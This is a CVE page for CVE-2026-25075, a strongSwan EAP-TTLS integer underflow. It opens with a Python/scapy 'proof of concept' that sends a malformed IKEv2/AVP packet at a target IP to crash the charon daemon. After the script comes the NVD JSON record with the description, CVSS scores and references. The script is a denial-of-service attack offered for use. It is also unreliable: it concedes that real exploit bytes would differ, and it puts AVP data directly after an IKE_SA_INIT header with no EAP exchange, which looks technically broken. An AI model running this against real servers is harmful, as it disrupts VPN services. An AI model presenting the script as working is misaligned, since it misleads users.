CVE-2026-25075

# PoC for CVE-2026-25075 strongSwan Integer Underflow # This script demonstrates the concept of sending a malformed EAP-TTLS AVP packet. # Requires scapy to be installed. from scapy.all import * def send_malformed_ike_packet(target_ip): # Construct a basic IKEv2 header (SA Initiator) # This is a simplified representation for demonstration. ike_header = IKEv2(init_SPI=RandString(8), resp_SPI=RandString(8), next_payload="None", version=0x20, exchange_type=34, flags=0x08, msg_id=1) # Construct a malformed AVP payload with an invalid length field causing underflow # In a real exploit, the exact bytes would be crafted to trigger the specific subtraction logic malformed_avp = Raw(b"\x00\x00\x00\x01" + b"\xff\xff\xff\xff" + b"A"*100) packet = IP(dst=target_ip)/UDP(dport=500)/ike_header/malformed_avp print(f"[*] Sending malformed packet to {target_ip}...") send(packet) print("[*] Packet sent. Check if the daemon crashed.") if __name__ == "__main__": target = "192.168.1.100" # Replace with actual target IP send_malformed_ike_packet(target)

{"cve": {"id": "CVE-2026-25075", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:39.313", "lastModified": "2026-05-04T19:16:02.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "strongSwan versions 4.5.0 prior to 6.0.5 contain an integer underflow vulnerability in the EAP-TTLS AVP parser that allows unauthenticated remote attackers to cause a denial of service by sending crafted AVP data with invalid length fields during IKEv2 authentication. Attackers can exploit the failure to validate AVP length fields before subtraction to trigger excessive memory allocation or NULL pointer dereference, crashing the charon IKE daemon."}, {"lang": "es", "value": "Las versiones de strongSwan 4.5.0 anteriores a la 6.0.5 contienen una vulnerabilidad de desbordamiento negativo de enteros en el analizador AVP de EAP-TTLS que permite a atacantes remotos no autenticados causar una denegación de servicio mediante el envío de datos AVP manipulados con campos de longitud no válidos durante la autenticación IKEv2. Los atacantes pueden explotar la falla al validar los campos de longitud AVP antes de la resta para desencadenar una asignación excesiva de memoria o una desreferenciación de puntero NULL, provocando la caída del demonio IKE charon."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-191"}, {"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://www.strongswan.org/blog/2026/03/23/strongswan-6.0.5-released.html", "source": "[email protected]"}, {"url": "https://www.strongswan.org/blog/2026/03/23/strongswan-vulnerability-(cve-2026-25075).html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/strongswan-eap-ttls-avp-parsing-integer-underflow", "source": "[email protected]"}, {"url": "https://y637f9qq2x.com/posts/cve-2026-25075/", "source": "[email protected]"}, {"url": "https://lists.debian.org/debian-lts-announce/2026/03/msg00016.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}